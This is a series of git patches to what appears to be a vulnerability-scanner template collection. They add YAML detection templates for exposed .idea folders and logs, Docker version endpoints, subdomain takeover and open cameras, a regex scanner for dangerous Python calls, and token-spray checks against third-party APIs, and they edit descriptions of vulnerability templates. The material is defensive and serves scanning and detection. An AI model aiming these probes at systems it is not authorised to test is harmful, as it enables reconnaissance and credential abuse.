From 0453f8e589a13e627b4535d3eb365df5f10b6517 Mon Sep 17 00:00:00 2001 From: Harsh kumar <51978908+harshinsecurity@users.noreply.github.com> Date: Mon, 12 Jul 2021 13:16:21 +0530 Subject: [PATCH 001/145] Create wix-takeover.yaml --- takeovers/wix-takeover.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 takeovers/wix-takeover.yaml diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml new file mode 100644 index 0000000000..8d88e4935b --- /dev/null +++ b/takeovers/wix-takeover.yaml @@ -0,0 +1,23 @@ +id: wix-takeover + +info: + name: wix takeover detection + author: harshinsecurity + severity: medium + tags: takeover + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + + matchers-condition: and + matchers: + - type: word + words: + - Error ConnectYourDomain occurred + - type: status + status: + - 404 From c0396ad58b3f9e7fb375b4d9ac50f4d0e4cf5ca3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 12 Jul 2021 15:29:23 +0530 Subject: [PATCH 002/145] Update wix-takeover.yaml --- takeovers/wix-takeover.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml index 8d88e4935b..2b1a07b3ca 100644 --- a/takeovers/wix-takeover.yaml +++ b/takeovers/wix-takeover.yaml @@ -10,14 +10,12 @@ requests: - method: GET path: - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - matchers-condition: and + matchers-condition: and matchers: - type: word words: - - Error ConnectYourDomain occurred + - 'Error ConnectYourDomain occurred' - type: status status: - 404 From 5f7519a89a838a25c473c4faa97fd0ef2d2ab0a2 Mon Sep 17 00:00:00 2001 From: martincodes <62392843+martincodes-de@users.noreply.github.com> Date: Wed, 20 Oct 2021 22:13:41 +0200 Subject: [PATCH 003/145] add template for .idea files with sensitive data --- .../.idea-folder-with-sensitive-files.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposures/files/.idea-folder-with-sensitive-files.yaml diff --git a/exposures/files/.idea-folder-with-sensitive-files.yaml b/exposures/files/.idea-folder-with-sensitive-files.yaml new file mode 100644 index 0000000000..123c126d92 --- /dev/null +++ b/exposures/files/.idea-folder-with-sensitive-files.yaml @@ -0,0 +1,19 @@ +id: .idea-folder-with.sensitive-files + +info: + name: Reachable or public .idea-Folder files containing sensitive data + author: martincodes-de + severity: high + description: Searches for .idea-Folder by querying the /.idea and a few other files with sensitive data endpoints + tags: phpstorm, jetbrains, .idea, sensitive data + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" + - "{{BaseURL}}/.idea/deployment.xml" + - "{{BaseURL}}/.idea/workspace.xml" + matchers: + - type: status + status: + - 200 \ No newline at end of file From 09d143b885d88286e2f358857813e56491345f6f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 21 Oct 2021 16:10:24 +0530 Subject: [PATCH 004/145] Update and rename .idea-folder-with-sensitive-files.yaml to idea-folder-exposure.yaml --- .../.idea-folder-with-sensitive-files.yaml | 19 ------------------ exposures/files/idea-folder-exposure.yaml | 20 +++++++++++++++++++ 2 files changed, 20 insertions(+), 19 deletions(-) delete mode 100644 exposures/files/.idea-folder-with-sensitive-files.yaml create mode 100644 exposures/files/idea-folder-exposure.yaml diff --git a/exposures/files/.idea-folder-with-sensitive-files.yaml b/exposures/files/.idea-folder-with-sensitive-files.yaml deleted file mode 100644 index 123c126d92..0000000000 --- a/exposures/files/.idea-folder-with-sensitive-files.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: .idea-folder-with.sensitive-files - -info: - name: Reachable or public .idea-Folder files containing sensitive data - author: martincodes-de - severity: high - description: Searches for .idea-Folder by querying the /.idea and a few other files with sensitive data endpoints - tags: phpstorm, jetbrains, .idea, sensitive data - -requests: - - method: GET - path: - - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" - - "{{BaseURL}}/.idea/deployment.xml" - - "{{BaseURL}}/.idea/workspace.xml" - matchers: - - type: status - status: - - 200 \ No newline at end of file diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml new file mode 100644 index 0000000000..d268dbb54d --- /dev/null +++ b/exposures/files/idea-folder-exposure.yaml @@ -0,0 +1,20 @@ +id: idea-folder-exposure + +info: + name: Public .idea Folder containing files with sensitive data + author: martincodes-de + severity: info + description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data. + tags: phpstorm,jetbrains,idea,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" + - "{{BaseURL}}/.idea/deployment.xml" + - "{{BaseURL}}/.idea/workspace.xml" + + matchers: + - type: status + status: + - 200 From fc39fdd2f753a5f2b221d14fb8a74188336b183b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 21 Oct 2021 19:29:49 +0530 Subject: [PATCH 005/145] Update idea-folder-exposure.yaml --- exposures/files/idea-folder-exposure.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml index d268dbb54d..d3d57a227d 100644 --- a/exposures/files/idea-folder-exposure.yaml +++ b/exposures/files/idea-folder-exposure.yaml @@ -13,8 +13,8 @@ requests: - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" - "{{BaseURL}}/.idea/deployment.xml" - "{{BaseURL}}/.idea/workspace.xml" - + matchers: - type: status - status: - - 200 + status: + - 200 From 62643edb222c999466d761185adf87ed571cdc39 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 14:23:37 +0530 Subject: [PATCH 006/145] Update idea-folder-exposure.yaml --- exposures/files/idea-folder-exposure.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml index d3d57a227d..b3cc98ea1d 100644 --- a/exposures/files/idea-folder-exposure.yaml +++ b/exposures/files/idea-folder-exposure.yaml @@ -10,7 +10,6 @@ info: requests: - method: GET path: - - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" - "{{BaseURL}}/.idea/deployment.xml" - "{{BaseURL}}/.idea/workspace.xml" @@ -18,3 +17,10 @@ requests: - type: status status: - 200 + + - type: word + words: + - " Date: Sun, 24 Oct 2021 14:25:40 +0530 Subject: [PATCH 007/145] Create idea-logs-exposure.yaml --- exposures/logs/idea-logs-exposure.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/logs/idea-logs-exposure.yaml diff --git a/exposures/logs/idea-logs-exposure.yaml b/exposures/logs/idea-logs-exposure.yaml new file mode 100644 index 0000000000..4a48e0fccb --- /dev/null +++ b/exposures/logs/idea-logs-exposure.yaml @@ -0,0 +1,26 @@ +id: idea-logs-exposure + +info: + name: Public .idea Folder containing http logs + author: martincodes-de + severity: info + description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file + tags: phpstorm,jetbrains,idea,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" + - "{{BaseURL}}/.idea/httpRequests/http-client.cookies" + + matchers-condition: or + matchers: + - type: regex + regex: + - '(?m)^(GET|POST) https?:\/\/' + part: body + + - type: word + words: + - "# domain path name value date" + part: body From 918c437dee396230943bb1e228fa79bbaaeb709b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Oct 2021 14:32:00 +0530 Subject: [PATCH 008/145] Update idea-folder-exposure.yaml --- exposures/files/idea-folder-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/idea-folder-exposure.yaml b/exposures/files/idea-folder-exposure.yaml index b3cc98ea1d..e29e9fa971 100644 --- a/exposures/files/idea-folder-exposure.yaml +++ b/exposures/files/idea-folder-exposure.yaml @@ -13,6 +13,7 @@ requests: - "{{BaseURL}}/.idea/deployment.xml" - "{{BaseURL}}/.idea/workspace.xml" + matchers-condition: and matchers: - type: status status: From 8ad49535b0cbbcecbcff782c97ec2438f1bd878f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 24 Oct 2021 12:38:06 +0300 Subject: [PATCH 009/145] Add description --- vulnerabilities/other/processmaker-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/processmaker-lfi.yaml b/vulnerabilities/other/processmaker-lfi.yaml index 824c545e2f..2aecb1c745 100644 --- a/vulnerabilities/other/processmaker-lfi.yaml +++ b/vulnerabilities/other/processmaker-lfi.yaml @@ -4,6 +4,7 @@ info: name: ProcessMaker <= 3.5.4 Directory Traversal author: KrE80r severity: high + description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content. reference: - https://www.exploit-db.com/exploits/50229 - https://www.processmaker.com From 854016684c8291e4a406929a371150b5ba6735d4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 24 Oct 2021 18:05:09 +0530 Subject: [PATCH 010/145] Add files via upload --- misconfiguration/docker-version-detect.yaml | 22 +++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 misconfiguration/docker-version-detect.yaml diff --git a/misconfiguration/docker-version-detect.yaml b/misconfiguration/docker-version-detect.yaml new file mode 100644 index 0000000000..9709eb0f28 --- /dev/null +++ b/misconfiguration/docker-version-detect.yaml @@ -0,0 +1,22 @@ +id: docker-version-detect +info: + name: Docker Version Detect + author: pussycat0x + severity: info + metadata: + shodan-dork: 'product:"docker"' + tags: docker,unauth,devops +requests: + - method: GET + path: + - "{{BaseURL}}/version" + matchers-condition: and + matchers: + - type: word + words: + - '"ApiVersion":' + - '"BuildTime":' + condition: and + - type: status + status: + - 200 \ No newline at end of file From 1eb3e16ea1a7390c6a41a85912fd12e2607b3f0b Mon Sep 17 00:00:00 2001 From: majid Date: Sun, 24 Oct 2021 16:48:44 +0330 Subject: [PATCH 011/145] Add file/python --- file/python/python-scanner.yaml | 49 +++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 file/python/python-scanner.yaml diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml new file mode 100644 index 0000000000..7fc05334ae --- /dev/null +++ b/file/python/python-scanner.yaml @@ -0,0 +1,49 @@ +id: python-scanner + +info: + name: Python Scanner + author: majidmc2 + severity: info + description: Scan for dangerous Python functions. + reference: https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html, https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html + tags: python,file + + +file: + - extensions: + - py + + extractors: + - type: regex + name: Possibility of SQLi vulnerability Code Injection + regex: + - 'exec' + - 'eval' + - '__import__' + + + - type: regex + name: The Command Injection Series + regex: + - 'subprocess.call\(.*shell=True.*\)' + - 'os.system' + - 'os.popen' + + + - type: regex + name: The pickle module is not secure + regex: + - 'pickle.loads' + - 'cPickle.loads' + + + - type: regex + name: Loading dangerous YAMLs + regex: + - 'yaml.load' + + + - type: regex + name: Possibility of SQLi vulnerability + regex: + - 'cursor.execute' \ No newline at end of file From 25a41dfc9f40e716816e12ba64cb6623c1a4411c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:03:44 +0700 Subject: [PATCH 012/145] Add Strava API test --- token-spray/strava.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/strava.yaml diff --git a/token-spray/strava.yaml b/token-spray/strava.yaml new file mode 100644 index 0000000000..cbe7b3cf90 --- /dev/null +++ b/token-spray/strava.yaml @@ -0,0 +1,23 @@ +id: api-strava + +info: + name: Strava API Test + author: dwisiswant0 + reference: https://developers.strava.com/docs/getting-started/ + severity: info + tags: token-spray,strava + +self-contained: true +requests: + - method: GET + path: + - "https://www.strava.com/api/v3/athlete" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "errors" + negative: true From f3919aac81f0f7b2b923a0f9ebc2f79fd782d944 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:16:24 +0700 Subject: [PATCH 013/145] Add Taiga API test --- token-spray/taiga.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/taiga.yaml diff --git a/token-spray/taiga.yaml b/token-spray/taiga.yaml new file mode 100644 index 0000000000..b22fc01cf8 --- /dev/null +++ b/token-spray/taiga.yaml @@ -0,0 +1,23 @@ +id: api-taiga + +info: + name: Taiga API Test + author: dwisiswant0 + reference: https://docs.taiga.io/api.html + severity: info + tags: token-spray,taiga + +self-contained: true +requests: + - method: GET + path: + - "https://api.taiga.io/api/v1/application-tokens" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "token_not_valid" + negative: true From cedf73c3f5f81eb0d51a646747e4abda4f5b4497 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:19:47 +0700 Subject: [PATCH 014/145] Add dbt Cloud API test --- token-spray/dbt.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 token-spray/dbt.yaml diff --git a/token-spray/dbt.yaml b/token-spray/dbt.yaml new file mode 100644 index 0000000000..3c3dd15317 --- /dev/null +++ b/token-spray/dbt.yaml @@ -0,0 +1,24 @@ +id: api-dbt + +info: + name: dbt Cloud API Test + author: dwisiswant0 + reference: https://docs.getdbt.com/docs/introduction + severity: info + tags: token-spray,dbt + +self-contained: true +requests: + - method: GET + path: + - "https://cloud.getdbt.com/api/v2/accounts/" + headers: + Content-Type: application/json + Authorization: Token {{token}} + + matchers: + - type: word + part: body + words: + - "Invalid token" + negative: true From 3f9ab497f71bcd80475f0d4448a9d9593408d9ba Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:25:39 +0700 Subject: [PATCH 015/145] Add AppVeyor API test --- token-spray/appveyor.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 token-spray/appveyor.yaml diff --git a/token-spray/appveyor.yaml b/token-spray/appveyor.yaml new file mode 100644 index 0000000000..c2b27b6d35 --- /dev/null +++ b/token-spray/appveyor.yaml @@ -0,0 +1,24 @@ +id: api-appveyor + +info: + name: AppVeyor API Test + author: dwisiswant0 + reference: https://www.appveyor.com/docs/api/ + severity: info + tags: token-spray,appveyor + +self-contained: true +requests: + - method: GET + path: + - "https://ci.appveyor.com/api/roles" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "Authorization required" + negative: true From 59f12021b0a119da27c8d2bd443142e6e33c4a63 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:29:54 +0700 Subject: [PATCH 016/145] Add Adafruit IO API test --- token-spray/adafruit-io.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/adafruit-io.yaml diff --git a/token-spray/adafruit-io.yaml b/token-spray/adafruit-io.yaml new file mode 100644 index 0000000000..b2253a1eac --- /dev/null +++ b/token-spray/adafruit-io.yaml @@ -0,0 +1,23 @@ +id: api-adafruit-io + +info: + name: Adafruit IO API Test + author: dwisiswant0 + reference: https://io.adafruit.com/api/docs/ + severity: info + tags: token-spray,adafruit + +self-contained: true +requests: + - method: GET + path: + - "https://io.adafruit.com/api/v2/user" + headers: + X-AIO-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - "error" + negative: true From 659eb0ee7b8803071bbf7faf589c4b5dfa792150 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:51:04 +0700 Subject: [PATCH 017/145] Add LeanIX API test --- token-spray/leanix.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 token-spray/leanix.yaml diff --git a/token-spray/leanix.yaml b/token-spray/leanix.yaml new file mode 100644 index 0000000000..8ad2e155eb --- /dev/null +++ b/token-spray/leanix.yaml @@ -0,0 +1,25 @@ +id: api-leanix + +info: + name: LeanIX API Test + author: dwisiswant0 + reference: https://docs.leanix.net/docs/rest-api + severity: info + tags: token-spray,leanix + +self-contained: true +requests: + - method: GET + path: + - "https://us.leanix.net/services/integration-api/v1/examples/starterExample" + - "https://eu.leanix.net/services/integration-api/v1/examples/starterExample" + headers: + Authorization: Bearer {{token}} + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "Credentials are required" + negative: true From 57f079835563c329c5a99a50ebe1960cb4a21271 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 25 Oct 2021 07:55:49 +0700 Subject: [PATCH 018/145] Add Cisco Webex API test --- token-spray/webex.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/webex.yaml diff --git a/token-spray/webex.yaml b/token-spray/webex.yaml new file mode 100644 index 0000000000..d876d5a459 --- /dev/null +++ b/token-spray/webex.yaml @@ -0,0 +1,23 @@ +id: api-webex + +info: + name: Cisco Webex API Test + author: dwisiswant0 + reference: https://developer.webex.com/docs/getting-started + severity: info + tags: token-spray,cisco + +self-contained: true +requests: + - method: GET + path: + - "https://webexapis.com/v1/rooms" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "errors" + negative: true From 2b4356dcc19d6a9fd2cd1e293c21a260c88b6413 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 25 Oct 2021 08:34:17 +0530 Subject: [PATCH 019/145] Add files via upload --- .../unauth-securityspy-camera-detect.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 misconfiguration/unauth-securityspy-camera-detect.yaml diff --git a/misconfiguration/unauth-securityspy-camera-detect.yaml b/misconfiguration/unauth-securityspy-camera-detect.yaml new file mode 100644 index 0000000000..9d3282e143 --- /dev/null +++ b/misconfiguration/unauth-securityspy-camera-detect.yaml @@ -0,0 +1,21 @@ +id: unauth-SecuritySpy-camera-detect +info: + name: SecuritySpy Detect + author: pussycat0x + severity: medium + metadata: + shodan-dork: 'title:SecuritySpy' + tags: unauth, iot +requests: + - method: GET + path: + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: word + words: + - 'SecuritySpy' + condition: and + - type: status + status: + - 200 \ No newline at end of file From a7c02f99dcf392847b9e787598f7f781992390f9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 25 Oct 2021 10:34:24 +0530 Subject: [PATCH 020/145] Update unauth-securityspy-camera-detect.yaml --- misconfiguration/unauth-securityspy-camera-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/unauth-securityspy-camera-detect.yaml b/misconfiguration/unauth-securityspy-camera-detect.yaml index 9d3282e143..76a4fc955c 100644 --- a/misconfiguration/unauth-securityspy-camera-detect.yaml +++ b/misconfiguration/unauth-securityspy-camera-detect.yaml @@ -1,6 +1,6 @@ id: unauth-SecuritySpy-camera-detect info: - name: SecuritySpy Detect + name: SecuritySpy Detect author: pussycat0x severity: medium metadata: @@ -18,4 +18,4 @@ requests: condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From 2a4d0446cb3e15c992f1ac72ef56ea35d263f34c Mon Sep 17 00:00:00 2001 From: Majid Iranpour <33040588+majidmc2@users.noreply.github.com> Date: Mon, 25 Oct 2021 06:44:24 +0000 Subject: [PATCH 021/145] Update python-scanner.yaml --- file/python/python-scanner.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 7fc05334ae..fb7b6a7902 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -15,7 +15,7 @@ file: extractors: - type: regex - name: Possibility of SQLi vulnerability Code Injection + name: Possibility of Code Injection vulnerability regex: - 'exec' - 'eval' @@ -23,7 +23,7 @@ file: - type: regex - name: The Command Injection Series + name: The Command Injection series regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -46,4 +46,4 @@ file: - type: regex name: Possibility of SQLi vulnerability regex: - - 'cursor.execute' \ No newline at end of file + - 'cursor.execute' From ee82e5c5915dbbd7ec46c284e1b79d8dde9ce210 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 09:56:44 +0300 Subject: [PATCH 022/145] Add description --- vulnerabilities/other/ruijie-eg-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index c3c1bccd2b..53a0745348 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -4,6 +4,7 @@ info: name: Ruijie EG cli.php RCE author: pikpikcu severity: critical + description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. reference: - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - https://www.ruijienetworks.com From 5636579be13f647c7f207871018dcbf0e44186d5 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 09:57:47 +0300 Subject: [PATCH 023/145] Non-broken link --- vulnerabilities/other/ruijie-eg-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index 53a0745348..fc7ebb44a7 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -6,7 +6,7 @@ info: severity: critical description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. reference: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://www.ruijienetworks.com tags: ruijie,rce From d03fce098eecf53851ac5f1bec2eb0cd52de981d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 09:58:59 +0300 Subject: [PATCH 024/145] Add description --- vulnerabilities/other/sap-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml index b682931eb4..e970788ccf 100644 --- a/vulnerabilities/other/sap-redirect.yaml +++ b/vulnerabilities/other/sap-redirect.yaml @@ -4,6 +4,7 @@ info: name: SAP wide open redirect author: Gal Nagli severity: medium + description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap From 130e5b1ff5f40c1d9d57ad4d474e7276b9592f93 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:01:03 +0300 Subject: [PATCH 025/145] add description --- vulnerabilities/other/unauth-hoteldruid-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/vulnerabilities/other/unauth-hoteldruid-panel.yaml index bdf29a8c0c..921549ed63 100644 --- a/vulnerabilities/other/unauth-hoteldruid-panel.yaml +++ b/vulnerabilities/other/unauth-hoteldruid-panel.yaml @@ -3,6 +3,7 @@ info: name: Unauthenticated Hoteldruid Panel author: princechaddha severity: high + description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. reference: https://www.hoteldruid.com/ tags: hoteldruid,panel,unauth From a3d1ca6b81992bf5f999dd4b2530e0e1791809d8 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:06:44 +0300 Subject: [PATCH 026/145] Description --- vulnerabilities/other/zhiyuan-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/other/zhiyuan-file-upload.yaml index 507967995b..ef4d17e337 100644 --- a/vulnerabilities/other/zhiyuan-file-upload.yaml +++ b/vulnerabilities/other/zhiyuan-file-upload.yaml @@ -4,6 +4,7 @@ info: name: Zhiyuan Oa arbitrary file upload vulnerability author: gy741 severity: critical + description: A vulnerability in Zhiyuan Oa allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. reference: https://www.programmersought.com/article/92658169875/ tags: zhiyuan,rce From 66a811c3c2d80c1eb4c2cf25e050d0975506aee8 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:06:50 +0300 Subject: [PATCH 027/145] Better description --- .../wordpress/wp-woocommerce-pdf-invoice-listing.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 1e407392e7..efdb6f29c9 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -4,7 +4,7 @@ info: name: Woocommerce PDF Invoice Exposure author: mohammedsaneem,sec_hawk severity: medium - description: Allows attacker to view sensitive information such as company invoices + description: A vulnerability in Woocommerce allows remote unauthenticated attackers to access company invoices and other sensitive information. reference: - https://twitter.com/sec_hawk/status/1426984595094913025?s=21 - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml From e9bd13da3e1ed2041076e00c72ed146b544c1978 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:07:28 +0300 Subject: [PATCH 028/145] Product name is 'OA' --- vulnerabilities/other/zhiyuan-file-upload.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/other/zhiyuan-file-upload.yaml index ef4d17e337..f596b39871 100644 --- a/vulnerabilities/other/zhiyuan-file-upload.yaml +++ b/vulnerabilities/other/zhiyuan-file-upload.yaml @@ -1,10 +1,10 @@ id: zhiyuan-file-upload info: - name: Zhiyuan Oa arbitrary file upload vulnerability + name: Zhiyuan OA arbitrary file upload vulnerability author: gy741 severity: critical - description: A vulnerability in Zhiyuan Oa allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. + description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. reference: https://www.programmersought.com/article/92658169875/ tags: zhiyuan,rce From 2bffa2663526c2d1107701f073f144936be29c17 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 10:09:13 +0300 Subject: [PATCH 029/145] Advisory description --- vulnerabilities/wordpress/wptouch-open-redirect.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/vulnerabilities/wordpress/wptouch-open-redirect.yaml b/vulnerabilities/wordpress/wptouch-open-redirect.yaml index 8f06d478a4..d999043d40 100644 --- a/vulnerabilities/wordpress/wptouch-open-redirect.yaml +++ b/vulnerabilities/wordpress/wptouch-open-redirect.yaml @@ -4,6 +4,14 @@ info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko severity: medium + description: | + WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. + + An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. + + Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. + + The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly 